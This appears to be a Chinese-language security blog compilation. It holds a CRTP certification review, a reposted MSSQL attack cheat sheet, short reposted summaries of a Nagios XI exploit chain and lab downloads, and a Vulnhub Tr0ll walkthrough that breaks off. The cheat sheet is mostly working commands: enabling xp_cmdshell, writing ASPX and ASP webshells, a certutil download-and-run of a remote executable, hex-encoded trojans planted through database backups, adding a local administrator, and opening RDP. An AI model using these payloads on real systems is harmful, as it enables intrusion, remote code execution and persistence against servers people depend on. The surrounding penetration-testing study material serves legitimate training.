Twitter 看到，順便保存記錄一下

關於 AD 攻擊的 Mindmap

https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg

Ref：https://twitter.com/M4yFly/status/1590457307103924224

我的 Certified Red Team Professional (CRTP) 之旅

2021 我完成了由 PentesterAcademy (https://www.pentesteracademy.com/activedirectorylab) 所推行的 Attacking and Defending Active Directory 的課程，並在中秋連假期間完成了 Certified Red Team Professional (CRTP) 認證

本篇文章將介紹關於 Certified Red Team Professional (CRTP) 的一些介紹。

關於這張證照與機構，在台灣可能很少人聽過，他的名氣不如 EC-Council 或 Offensive Security 有名，但我相信他的實驗室與課程，絕對值得你報名學習。

關於 PentesterAcademy 是由 Vivek Ramachandran 所創立，他曾在包括 Black Hat USA、DEFCON 等多個世界頂級研討會上發表演講與進行培訓。並在安全領域擁有超過十年的經驗。

而關於 Attacking and Defending Active Directory 課程的講師則是由 Nikhil Mittal 所擔任，他也是 BlackHat USA、BlackHat Europe 與 DEFCON 講師，並且開發了許多知名的安全滲透工具，如：Nishang (在 Github 上高達 5.7K Star)

為什麼會選擇這門課程 ?

事實上有幾個原因：

1.2019 下半年，我完成了 Offensive Security Certified Professional (OSCP) 考試，關於 OSCP 的相關介紹，網路上其實很多文章可以參考。

之前也有寫過一篇關於 OSCP 的考試心得，不過礙於官方規定，因此無法透漏太多關於 OSCP 的內容。

通過了 OSCP 認證，經過短暫的休息後，很快的我鎖定了 Offensive Security Web Expert (OSWE) 與 CRTP 這兩個課程(證照)，關於 OSWE 是由 Offensive Security 機構所推行的，這張證照主要是針對 Web 的白箱原始碼審計進行攻擊與利用，需要從網站原始碼中找出漏洞，並獨力撰寫 Exploit 取得權限。而 CRTP 則是針對 Active Directory 環境中所遇到的威脅和攻擊而設計。

事實上兩張是完全不一樣的攻擊面向，但有一句話是這麼說的

2.現在上班，平常工作內容除了協助客戶場域資安事件調查外，也會與客戶進行互動，最常遇到的就是 客戶網管比你還不熟 AD 設定，可能連 GPO 派送都不會設，帳戶權限任意寫入。

因此為了解決上述問題，我決定也好好學習下關於 Windows AD 上的服務，並了解 AD 可能面臨的攻擊。

駭客攻擊手法千變萬化，AD 上的設定更是複雜，正所謂 「知己知彼，百戰不殆」，如果說自己都不了解這些東西，那如何要保護好客戶的場域。

關於 CRTP 這門課，他涵蓋了 Active Directory 和 Powershell 的基礎知識，包括： AD enumeration, trusts mapping, domain privilege escalation, domain persistence, Kerberos based attacks (Golden ticket, Silver ticket and more), ACL issues, SQL server trusts, Defenses and bypasses of defenses. 因此對於想要了解更多關於 AD 滲透和 Powershell 的資安人員來說，這是一個非常好的開始。

CRTP vs. OSCP

CRTP (Certified Red Team Professional)

從官網上，可以看到 CRTP 與 OSCP 的價格表，兩者皆分成 30、60 與 90 天的 Lab，並包含 1 次的考試機會。同時價差也非常大，如果真要說，我想就是知名度吧。CRTP 在台灣比較沒什麼人聽過，而後者的知名度在台灣還是比較知名的，

Ref：https://www.pentesteracademy.com/activedirectorylab

讓我們來看看這兩門課程可以獲得些什麼 ?

首先是 CRTP，其實在官網上也都有寫，總共分成 10 個主題，我省略了細節部分，有興趣的可以直接上官網去看。

23 Learning Objectives, 59 Tasks, >120 Hours of Torture :)

Active Directory Enumeration
Local Privilege Escalation
Domain Privilege Escalation
Domain Persistence and Dominance
Cross Trust Attacks
Forest Persistence and Dominance
Defenses – Monitoring
Defenses and bypass – Architecture and Work Culture Changes
Defenses and Bypass – Deception
Defenses and Bypass – PowerShell

上述是官方規劃的課程目標，總共分類為 10 點，然後他有 59 個 任務，每個章節都有 2-4 個 任務。

比如說，他會先要求你透過 資訊蒐集，取得某個資訊，這是第一個任務，然後下一個任務可能就是要取得 Hash，第三個任務則是提權，他的 Lab 是低權限帳號，然後有 Windows Defender。

所以像是最後幾個章節，他就是在教你當你遇到一些阻礙的時候，要如何 Bypass AMSI，例：進行混淆或使用編碼或將其拆分為塊並重新組合就可以解決此問題。

你不用擔心你不熟悉 Powershell，因為他前面的章節就是比較從零知識開始教起，跟你說 Get-Help 是什麼意思，該如何使用以及 Get-Process 和如何更改 Powershell Policy 等，所以你只要跟著教材的教學一步一步進行即可。

事實上，就是 Step by step 教學，然後他也有可能是怕你不熟悉 DC，所以會針對很多地方會有比較基礎跟詳細的說明，例：他前面再講要對 Domain 進行 Recon 的時候，就會講一下 Forest 和 Domain 與 OU 之間的關係。

除此之外，其實也有一點是讓我覺得值得誇獎的是，他會跟你說 他做這些 Recon 的原因是為了什麼，為什麼前期的 Recon 如此重要，而你可以蒐集哪些資訊 ?

當然，這些資訊的目的，除了是讓你能夠快速地提權跟橫向移動外，也有避免說讓你不輕易被網管或資安偵測產品發現。

OSCP (Offensive Security Certified Professional)

Ref：https://www.offensive-security.com/pwk-oscp/

OSCP 主要有 25 個主題，同樣也包含 Lab 練習。

如果對於 OSCP 有興趣的可以私訊我，網路上也不少文章寫得很詳細。

17+ hours of video, 850-page PDF course guide, Over 70 machines, including recently retired OSCP exam machines

Penetration Testing: What You Should Know
Getting Comfortable with Kali Linux
Command Line Fun
Practical Tools
Bash Scripting
Passive Information Gathering
Active Information Gathering
Vulnerability Scanning
Web Application Attacks
Introduction to Buffer Overflows
Windows Buffer Overflows
Linux Buffer Overflows
Client-Side Attacks
Locating Public Exploits
Fixing Exploits
File Transfers
Antivirus Evasion
Privilege Escalation
Password Attacks
Port Redirection and Tunneling
Active Directory Attacks
The Metasploit Framework
PowerShell Empire
Assembling the Pieces: Penetration Test Breakdown
Trying Harder: The Labs

小總結下 CRTP vs. OSCP

簡單來說這兩張的差別在於說 CRTP 他全部都是 Windows AD 環境，包含你自己的攻擊機，不管是在 Lab 還是考試中，都不會使用到 CVE Exploit，CRTP 主要希望可以透過一些 AD 套件和信任的管理設定不當來進行利用，並且不會依賴任何可修補的漏洞利用。本課程預設的是服務設定都是不安全的，你要嘗試找出不安全配置進行滲透、橫向移動。

CRTP 著重於 Windows 上的相關資訊利用，課程中主要依賴於 PowerShell 進行資訊蒐集與常見服務(如：Jenkins)滲透，並學習 GPO、BloodHound、Silver Ticket、krbtgt 等進行後滲透。

在 CRTP ，實驗室與影片課程一起進行。您可以從影片中學習每個概念，然後可以通過一些稱為“Learning Objectives” 自行練習。這使得 CRTP 對於幾乎沒有 Active Directory 經驗的人非常有用。這些概念在影片中得到了很好的解釋，如果您遇到任何學習目標，您可以隨時查看影片或文件。

另外，值得注意的是他們有一個很好的 Support email，如果你對課程與教材有任何問題，你只需要給他們發 email，將會快速地得到回覆。

曾經我在進行 Lab 練習時，遇到 shell 一直無法成功取得的問題，因此我寄信給官方請求問題後，官方很快地在 30 分鐘內就回覆了我的問題，並告訴我無法成功取得 shell 的原因。(原來是因為我忘記把防火牆給關閉了)

而 OSCP 則是利用 Kali Linux 當作攻擊機，嘗試找出各種服務中的漏洞，並找出相對應的 CVE Excploit 來利用取得 Shell。

OSCP 也是會有很多 Lab 機器，有 Windows 與 Linux，然後你要想辦法透過資訊蒐集方式取得有用的線索，找出漏洞後，透過像是 CVE 的 exploit 來取得權限.

但 OSCP 有個缺點就是，他雖然提供了大約 50 台的練習主機，但他最後沒有一些提示跟解答，所以你就算最後 Lab 與考試時間到期了，你還是不曉得你沒解開的那些機器，問題到底在哪。(儘管你成功通過 OSCP 考試)

這是我覺得 OSCP 比較可惜的地方，然後 OSCP 的價格也對於學生或剛出社會的人來說，也是負擔比較重的。當然如果有公司贊助的話，那就去報名吧！

所以你問我這兩門課程有什麼不同 ? 如果已經有 OSCP 了，還需要去報名嗎 ?
我認為這兩者學習面向不同，就如同我在前年通過了 OSCP，但在準備這門證照時，還是下了很多功夫，花了超過半年時間在準備，因為事實上，你在 OSCP 的課程與考試中，你不會遇到 Windows Defender (極少)，你也不需要橫向移動，你的目標就是成功取得各自獨立的 5 台機器權限即可。

在 CRTP 中，你遇到的每一台主機基本上都有 Windows Defender，除了繞過之外，當你取得 administrator 權限後，接著你可能要利用 Kerberos Golden ticket 移動到其他主機。

考試中，有約 6 台主機需要都取得最高權限，你的目的就是先從第一台開始嘗試找出脆弱性服務，並進行提權，與思考該如何一步一步拿下其他主機，最終取得 AD 伺服器。

考試中，每一台主機因為都處在 AD 環境中，因此都是有關連性的，這是與 OSCP 不同的地方。你會大量地使用到如：PowerView、PowerCat、PowershellTCP 與 BloodHound，甚至有機會使用到 Nirsoft 的工具將使用者的密碼嘗試還原，你可以從 瀏覽器、WiFi、RDP 等不同地方取得使用者密碼紀錄。

這也是有趣的一點，事實上實際的資安事件中可能不如你所想的需要使用到高超的駭客技巧，往往只需要找到一個脆弱的點就可入侵到企業內部，而內部員工的資安意識就更為重要了。

筆者曾經到許多客戶電腦進行事件調查，最常看到的就是員工們都把密碼記錄在電腦桌面，不管是記事本，或 Windows 便條紙，這些都是非常不好的，只要其他人從你背後經過都可以看到你的帳號密碼，駭客登入到你的電腦也可直接取得，得來全不費吹灰之力。

題外話，其實還有一點很值得思考，當企業導入了各項 ISO，並且規定密碼長度與密碼更換時間，其實人們很難記住這麼多組的密碼，尤其每幾個月就必須更換一次，還不能跟之前的相同。

當然可以使用如 1Password 這類型的密碼管理工具，但這些其實都是較有 資訊背景的人可能才會使用，想想看如果你的企業有 5,000 人，很難要求所有員工都能做到。

回到正題，你問我如果有了 OSCP，那建不建議也報名 CRTP ?

如果你本身對於 Windows AD 與 PowerShell 不熟悉的，那我強烈建議你可以報名試試，反正價格也不貴，對於學生們來說還是可以負擔的。

另外一優點是，當你報名後，你不會有時間上的壓力要進行 Lab 與 考試，前面你可以先規劃安排學習課程中的 PDF 與 Video ，等你準備好了隨時都可以開始 Lab 與考試。

• OSCP 報名開始後，就開始計算 Lab 時間了，所以多少會有時間上的壓力。畢竟 PDF 與 Video 還是需要花費不少時間去閱讀準備。

所以我為什麼會覺得 CRTP 這個課程製作的算友善的原因，有幾點：

1.你有問題，可以寄到他的 Email，他都很快就會回覆了
2.他的影片 教材 都可以重新觀看，也可以下載
3.他的影片 教材 會從基礎開始教起，所以你也不用太擔心你如果不熟 Windows 或 Powershell 怎麼辦
4.價格友善

該具備什麼知識 ? 我是如何準備 ?

由於工作原因，我報名的是 60 天的方案，這樣我可以比較不會有壓力，可以利用平日下班與假日期間在公司偷電好好學習，每個影片的時間長度大約是 30 ~ 60 分鐘，影片會從最基礎開始講起，包括為甚麼你前期會需要先進行資訊的蒐集

我的學習方式可以參考下，當然每個人都有不同的方法，選擇最適合你自己的就好：

1.由於會大量使用到 Powershell，因此我選擇使用 Xmind 心智圖，進行指令的筆記，這樣可以方便我快速尋找並知道我下一步要如何進行。

2.Youtube 內建字幕

由於我的英文能力較差，因此我會利用各種方式去閱讀英文文件與影片，這邊分享一個小技巧給大家。
因為教材影片是可以下載的，因此我將這些影片上傳到 Youtube 私人帳號，並利用 Youtube 的自動翻譯將講師講的話翻成中文字幕，再搭配英聽與簡報上的畫面，這樣我能夠快速了解講師在講什麼。

只不過自動翻譯還是會有很多翻譯錯的地方，反正就是加減看。

3.與 OSCP 一樣，可以去註冊 HackTheBox (https://www.hackthebox.eu/)， 他提供了許多的 Lab 靶機可以練習。所以可以多上如 Vulnhub 與 HackTheBox 去多玩玩。
例：Forest、Sauna、Active、BlackField 等。

4.一些網路上學習文件

1. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
2. https://adsecurity.org/
3. http://www.harmj0y.net/blog/blog/
4. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

考試狀況

考試隨時都可以開始，當你一切都準備好之後，隨時都可以登入到平台上進行啟動，並使用他們提供的 VPN 進行連線。

考試時間為 24 小時，而報告撰寫時間是 48 小時，其實與 OSCP 差不多，只不過 CRTP 提供了更充裕的時間可以整理考試報告。

我利用中秋節連假進行了準備，前面幾天為了能夠讓我更適應考試期間所帶來的壓力與熬夜不適，我快速的翻閱教材 與 HackTheBox 刷題，接著放下手邊一切工作讓我保持在迎接狀態。除此之外，雞精、葉黃素與水果是我考試期間能夠讓我保持精神的來源之一。

在考試時，儘管我已經知道可能會使用到 BloodHound，但我原本是想說我可以在考試機上面進行架設，因此我就沒有事先準備了。

到了要利用時，我後悔了，因為考試環境不允許上傳超過 100MB 的檔案，雖然我嘗試進行壓縮分批上傳，但進行環境設定時，總是遇到各種錯誤，為此我為了 debug 與架設 BloodHound 花費了我不少時間。

最後我放棄了，我還是選擇在本地 VM 額外進行 BloodHound 的環境來使用。

所幸的是，我成功了，並透過 BloodHound 找到了問題點來取得權限。

另外官方有提到，考慮到有些人母語不是英語系國家的人，你可以在報告上額外註記你母語不是英文，他們會對你的文法不那麼要求，只要你的意思有表達對就好。

但你還是要用英文寫，並且說明為甚麼你要這樣執行的原因。考試的報告除了證明你有成功取得機器外，你還要說明你的想法，為甚麼你要這樣做，這也是很重要的一點。

考試對我來說壓力還是很大，因為我發現 Windows 還是太難了，我從早上 9 點開始考試，大約到了晚上 8 點我才成功取得所有機器的管理者權限，總花費了 11 小時。

而在報告撰寫上，由於先前工作職務上 與 OSCP 的考試經驗，因此我撰寫了共 23 頁的報告，共花費了 4 個小時。

我反覆檢查，並寄出了我的報告，等待成果。

結論

等待了四天，這天剛好休假與同事們出去散心，在車上突然收到了 Active Directory Lab Support 寄來的信件，標題寫著 Certified Red Team Professional - Exam Result

我迫不急待的打開，上帝保佑，幸運的我通過了考試

這個標題看起來很酷，「紅隊認證專家」，但我知道自己還有很多不足的地方，還有許多事情我必須經歷，但說實話這門課程對我的幫助很大，這是一次了不起的經歷。

另外，如果你通過了考試，他的有效期限是 3 年，過了期限你就必須要再次重新考試認證。

雖然這張證照在台灣應該沒什麼企業聽過，無法幫助你加薪以及找到更好工作，但我覺得以這價格來說，他的課程覺得值得你報名學習。

而，如果你對 Active Directory Attacks and Defense 有興趣的，我還是很推薦這門課程，歡迎大家報名。

接下來，我正在準備 OSWE (10/1 開始)，並且後續也規劃了 CISSP ，我也關注了 Pentesteracademy 的 Certified Red Teaming Expert (CRTE)

• OSWE (https://www.offensive-security.com/awae-oswe/)
• CISSP (https://www.isc2.org/Certifications/CISSP)
• CRTE (https://www.pentesteracademy.com/redteamlab)
• OSEP (https://www.offensive-security.com/pen300-osep/)

其實我也不是什麼證照派的，只是覺得這些都有較系統性的規劃，所以如果你找不到方向時，不如就按照這些課程規劃的去學習吧。

希望這次的旅途對你有幫助。

時常需要對 SQL Server xp_cmdshell 進行設定，筆記一下。

文章資料來源：https://www.cnblogs.com/jerrylocker/p/10938899.html

xp_cmdshell

第一種：在SQL Server 2005之前版本中，xp_cmdshell是默認開啟的，因此可以直接利用，執行系統命令

exec master..xp_cmdshell 'whoami';

第二種：先判斷是否存在xp_cmdshell存儲過程，返回1表示存在，否則表示不存在

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';

xp_cmdshell是有可能被管理員手動刪除的（尤其是SQL Server2005之前默認開啟的版本），以下是刪除xp_cmdshell的命令：

exec master..sp_dropextendedproc xp_cmdshell;

當然，即使xp_cmdshell被刪除，也是有辦法恢復xp_cmdshell的：

exec master..xp_dropextendedproc xp_cmdshell,@dllname='xplog70.dll' declare @o int;

注意：再喪心病狂的管理員，可能連xplog70.dll文件都刪除，因此需要手動刪除該文件，然后使用絕對路徑引用即可：

exec master.dbo.sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll的文件絕對路徑' declare @o int;

在SQL Server 2005之后的版本中，xp_cmdshell是默認關閉的，因此需要手動開啟，但是開啟xp_cmdshell需要sa權限，所以還是比較苛刻的

允許修改高級參數

exec sp_configure 'show advanced options',1;

配置生效

RECONFIGURE;

開啟xp_cmdshell

exec sp_configure 'xp_cmdshell',1;

配置生效

RECONFIGURE;

檢查xp_cmdshell是否開啟

exec sp_configure;

執行系統命令

exec master..xp_cmdshell 'whoami';

獲取webshell，此處注意><符號的轉義，網頁編碼和數據庫編碼一般是相同的，中文一般都要URL編碼

exec master..xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\233.aspx'

獲取webshell，通過windows的多種cmd下載文件的方式，下載遠程的可執行文件，通過該方式可用於反彈shell

下載惡意程序

exec master.dbo.xp_cmdshell 'cd c:\\www & certutil -urlcache -split -f http://ip/file.exe';

執行程序

exec master.dbo.xp_cmdshell 'cd c:\\www & file.exe';

使用結束后，可自行關閉xp_cmdshell

開啟高級選項

exec sp_configure 'show advanced options',1;

配置生效

RECONFIGURE;

關閉xp_cmdshell

exec sp_configure 'xp_cmdshell',0;

配置生效

RECONFIGURE;

數據庫差異備份getshell

備份拿shell算是常見，但往往備份后包含木馬的文件很大。
注意：目標路徑必須有寫權限

查看要創建的臨時表是否被占用

IF EXISTS(select table_name from information_schema.tables where table_name='temp') drop table temp;

將數據庫備份至文件中

backup database db_name to disk = "目標文件路徑.bak";

創建臨時表

create table test (a image);

寫入木馬

insert into test(a) values(0x3C25657865637574652872657175657374282261222929253E);

重新備份，木馬寫入文件

backup database db_name to disk = '目標文件路徑.asp' with differential,format;

日志差異備份getshell

可不需要sa權限，如果不能備份，可能是訪問權限問題，可切換目錄嘗試；如果臨時表存在也可能導致失敗，可先判斷臨時表是否存在，再嘗試。

條件：

數據庫之前備份過
恢復模式是完整模式
目標路徑有寫權限

查看要創建的臨時表是否被占用

IF EXISTS(select table_name from information_schema.tables where table_name='temp') drop table temp;

將數據庫的恢復模式設置為完整模式

alter database db_name set RECOVERY FULL;

創建臨時表

create table temp (a image);

備份數據庫日志，並寫入文件中

backup log db_name to disk = '任意絕對路徑.bak' with init;

在臨時表中插入木馬字符串

insert into temp (a) values (0x3C25657865637574652872657175657374282261222929253E);

將含有木馬字符串的日志備份寫入文件中

backup log db_name to disk = '木馬的絕對路徑.aspx';

sp_oacreate

當xp_cmdshell被刪除時，可以嘗試使用這個來提權

原理

利用OLE對象接口，SQL Server提供了一些函數訪問OLE對象，分別是sp_oacreate和sp_oamethod，可利用它們調用OLE控件，間接獲取一個shell

預准備工作

檢查OLE Automation Procedures狀態

exec sp_configure 'Ole Automation Procedures';

如果config_value和run_value都為0，表示禁用

啟用OLE Automation Procedures

允許修改高級參數

exec sp_configure 'show advanced options',1;

配置生效

reconfigure;

開啟Ole Automation Procedures

exec sp_configure 'Ole Automation Procedures',1;

配置生效

reconfigure;

關閉高級參數

exec sp_configure 'show advanced options',0;

wscript.shell

在SQL Server 2008和SQL Server 2000上都適用

聲明一個變量

declare @shell int;

使用sp_oacreate調用wscript對象

exec sp_oacreate 'wscript.shell',@shell output;

使用sp_oamethod調用變量的屬性run執行系統命令

exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test /add';

整合一下：添加用戶 test/test

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test /add'

整合一下：添加用戶到管理員組

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators test /add'

Shell.Application

SQL Server 2008不可用，SQL Server 2000可用

整合一下：添加用戶 test/test

declare @o int;
exec sp_oacreate 'Shell.Application', @o out;
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user test test /add','c:\windows\system32','','1';

sp_makewebtask

SQL Server2008不可用，SQL Server2000可用（未驗證）

恢復xp_makewebtask存儲過程

exec sp_configure 'Web Assistant Procedures', 1;
RECONFIGURE;

getshell

exec sp_makewebtask 'C:\test1.php','select''<%execute(request("SB"))%>''';

沙盒模式

只有windows xp和windows 2003可用

啟用Ad Hoc Distributed Queries

exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure

關閉沙盒模式

0：在任何使用者中禁用啟用安全模式

1：僅在允許范圍內

2：必須在access模式下

3：完全開啟

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

讀取SandBoxMode[可選]

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode';

執行系統命令：添加用戶 test/test

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test test /add")');
select * from 
openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select
shell("cmd.exe /c whoami")')

mssql-遠程桌面

是否開啟遠程桌面，1表示關閉，0表示開啟

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'

讀取遠程桌面端口

Server\WinStations\RDP-Tcp','PortNumber'

開啟遠程桌面

EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;

reg文件開啟遠程桌面

Windows Registry Editor Version 5.00HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]"fDenyTSConnections"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]"PortNumber"=dword:00000d3d

保存至1.reg，執行regedit /s 1.reg，即可開啟遠程桌面

注意：如果是第一次開啟遠程桌面，部分需要配置防火牆規則允許遠程端口

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

關閉遠程桌面

EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;

原文地址：https://mp.weixin.qq.com/s?__biz=Mzg3NzE5OTA5NQ==&mid=2247483807&idx=1&sn=59be50aa5cc735f055db596269a857ce&chksm=cf27ea07f8506311d1c421e48d17deeebc19d569b037e0eb6c83656fee30fd9d59cc8228e372&token=2130309421&lang=zh_CN

整理總結一下域滲透中常用的知識和手法

－－－－－－－－－－－－－－－－－－－
如果你認同我們每日分享的文章，請幫我們按個讚並且點擊追蹤「搶先看」，讓我們提供最新消息給您！您的分享及點讚，是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

原文地址：https://lihi.cc/b80Sz

Nagios XI是一款易於使用，完整的IT基礎架構監控應用程式，能夠監控企業的關鍵伺服器，網路裝置，服務和應用程式，並在出現問題時通知企業管理員。

Nagios XI能夠通過使用內建功能和第三方擴充套件和外掛來監控數百種不同類型的應用程式、服務、協議和計算機硬體。遠端攻擊者可以欺騙管理員或者授權使用者（具有建立“自動發現作業”許可權的使用者）訪問包含跨站指令碼（XSS）的惡意URL(CVE-2019-9167)，管理員或者授權使用者將會在NagiosXI Server上進行程式碼執注入從而導致遠端執行程式碼（RCE）(CVE-2019-9164)和本地獲取遠端root shell特權升級（LPE）(CVE-2019-9166)。

通過以上3個漏洞的組合利用，攻擊者可以以遠端的方式獲取NagiosXIServer的root許可權。

前言引用來源：https://lihi.cc/b80Sz
文章圖片來源：https://lihi.cc/b80Sz

－－－－－－－－－－－－－－－－－－－
如果你認同我們每日分享的文章，請幫我們按個讚並且點擊追蹤「搶先看」，讓我們提供最新消息給您！您的分享及點讚，是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

原文地址：https://lihi.cc/RJgf4

此次僅共享部分基礎web環境

所有的虛擬機器環境均是模擬實際生產環境搭設，只保留最基礎的架構[ 至於後期要裝什麼程式，調什麼參數，配置，都可根據自己的實際需求隨意來 ],這麼做的目的也是為了讓大家後期能夠更加靈活去隨意組裝模擬自己遇到的某些實戰場景以更好的協助分析問題

環境下載
https://pan.baidu.com/s/11coXSih-VJWoR76WyTc_7g

提取碼：wmxc

注: 以上鍊接僅七天有效，有需要的弟兄，請儘快下載，此後將不再補鏈，歡迎弟兄們積極轉發，留給真正需要的朋友們

前言引用來源：https://lihi.cc/RJgf4
文章圖片來源：https://lihi.cc/RJgf4

－－－－－－－－－－－－－－－－－－－
如果你認同我們每日分享的文章，請幫我們按個讚並且點擊追蹤「搶先看」，讓我們提供最新消息給您！您的分享及點讚，是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

原文地址：https://lihi.cc/Bp5P6

Domain，作為實際內網滲透中遇到最多的環境，我們可能急需對其有個更加體系 全方位的清晰認知，但這一切的前提是，你得先有一套屬於自己的完整 "標準" domain環境，klion作者幫忙整理一系列的環境，所有虛擬機器幾乎都是 "開箱即用"

環境下載地址

連結：https://pan.baidu.com/s/1hWFisWHpIfJQ7X7HjD4lNw

提取碼：45xt

後續所有環境統一解壓密碼: ptriker.github.io

注: 同樣，以上鍊接僅七天有效，有需要的弟兄，請儘快下載，此後將不再補鏈，歡迎弟兄們積極轉發，留給真正需要的朋友們，有任何問題，歡迎隨時留言，這幾天關注公眾號會比較多點,

前言引用來源：https://lihi.cc/Bp5P6
文章圖片來源：https://lihi.cc/Bp5P6

－－－－－－－－－－－－－－－－－－－
如果你認同我們每日分享的文章，請幫我們按個讚並且點擊追蹤「搶先看」，讓我們提供最新消息給您！您的分享及點讚，是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

原文地址：https://www.secpulse.com/archives/103664.html

RedTeam的起源是出現在軍事領域方面，人們意識到，要做到更好的防守，就需要去攻擊自己的防禦，才能更好的找到防守的弱點，在國內，進攻方為藍軍，防守方為紅軍，藍軍我自己習慣稱為RedTeam，紅藍對抗的意義在於幫助防守者更全面的意識到自己的薄弱之處。

前言引用來源：https://www.secpulse.com/archives/103664.html
文章圖片來源：https://www.csoonline.com/article/2122440/emergency-preparedness-red-team-versus-blue-team-how-to-run-an-effective-simulation.html

－－－－－－－－－－－－－－－－－－－
如果你認同我們每日分享的文章，請幫我們按個讚並且點擊追蹤「搶先看」，讓我們提供最新消息給您！您的分享及點讚，是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

VulnHub是一個面向所有人開放的安全靶場，裡面有很多安全環境，只要下載相關映像檔，在相關虛擬機器上面執行就可以練習相關靶場了。裡面設計了好多關，如果有耐心一定可以到達峰頂。許多考OSCP人員，也會利用Vulnhub靶場進行刷題。我們下載了一個經典漏洞靶場，給大家進行演示，希望讓初學者知道滲透測試的套路，可以更快的成長。

該題從匿名帳戶的FTP裡，發現個pcap封包檔，從該pcap檔裡分析出網站目錄後，得到帳號列表，接著使用hydra進行ssh爆破。該主機主要有兩個方式可以提權為root，一種是透過overlayfs，一種是該伺服器存在例行性工作排程，於是可透過該排程進行提權，成為root後得到Flag。

靶機：Tr0ll: 1

首先，先查詢自己本地的IP，可以透過 ifconfig查詢。

eth0 192.168.43.119 這是本地IP ，同時也是攻擊者端

使用Nmap工具掃描，參數 -sP ，透過ICMP方式快速查找標的端。

標的端為192.168.43.55

找到標的端後，同時間，我們另開個視窗，透過Dirb掃描該目錄

使用nmap -A 完整掃描該主機，並搭配 -p 0-65535 掃描該伺服器端口。

共開啟 21 port、22 port、80 port，而21 port 是FTP，根據顯示 FTP似乎可以透過Anonymous登入。

這將會是一個利用點。

嘗試登入該FTP，帳號Anonymous，密碼為空。

登入到該主機後，發現有個檔案lol.pcap，是個封包檔

可透過WireShark工具打開來。

透過WireShark打開後，有幾個訊息令我感興趣，

RETR secret_stuff.txt

點開來查看詳細資料，看看能不能在這封包看到些什麼，發現有一段文字，似乎再透漏些消息。

sup3rs3cr3tdirlol <-- ??

根據以上消息，看起來是個檔案，說不定存在一些能夠利用的訊息，於是嘗試訪問該檔案http://192.168.43.55/secret_stuff.txt

可惜的是，沒有這檔案。

思考了很久，最後嘗試將 sup3rs3cr3tdirlol 訪問，很高興的竟然訪問成功了，

是一個檔案，立刻下載下來查看下。

在Linux環境下直接cat查看，發現噴出一大堆亂碼

當拿到一個檔案後，思路馬上轉換為CTF想法，嘗試各種binwalk、strings、foremost、ida等

先將檔案給他個權限，看看能不能執行，

chmod +x roflmao

執行後，噴出一句話

Find address 0x0856BF to proceed

看來沒辦法直接執行。

用Binwalk簡單分析下，是個ELF 32-bit的檔案，然後就沒然後了。

用foremost分析看看能不能分出個什麼檔案，結果也然後了。

使用strings查看該檔案，也是沒有可利用的資訊。

在這邊卡了很久，休息了一下，實在想不到接下來能幹嘛，於是就卡關了。

後來一直再思考這個檔案有什麼用處? 還有什麼沒看到的?

audit.txt嗎? 還是 ?

看著檔案顯示著 Find address 0x0856BF to proceed

尋找0x0856BF，丟IDA也沒頭緒，於是腦洞丟到網址列看看...

Surprised! 竟然跑出兩個驚喜出來。

good_luck目錄下有個which_one_lol.txt的檔案。

which_one_lol.txt裡邊看起來是一個帳號列表。或許是FTP? 或許是SSH?

不管怎麼樣，都是個好消息！

還有另外一個目錄，底下有個Pass.txt

Pass.txt只有顯示一句話

Good_job_:)

那麼廢話不多說，有了疑似帳號密碼的列表後，馬上就使用hydra來幫我們爆破下

最後顯示帳號為 overflow 密碼為 Pass.txt

於是我們登入SSH

登到該主機後，馬上查詢下該主機用戶 及 系統版本

id & whoami & uname -a

看到這個版本號與年份，讓我聞到了提權的味道。

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

不過在提權之前，我們先簡單查看下該主機有什麼其他有趣的東西。

可以搜索下 /home /etc /var /var/www /data /tmp等目錄

最終，因為其他目錄都沒有看到其他東西，於是我們翻遍log，希望能夠看到些有趣的事情。

在cronlog裡，發現到有一個cleaner.py

為甚麼會想查詢cronlog呢?

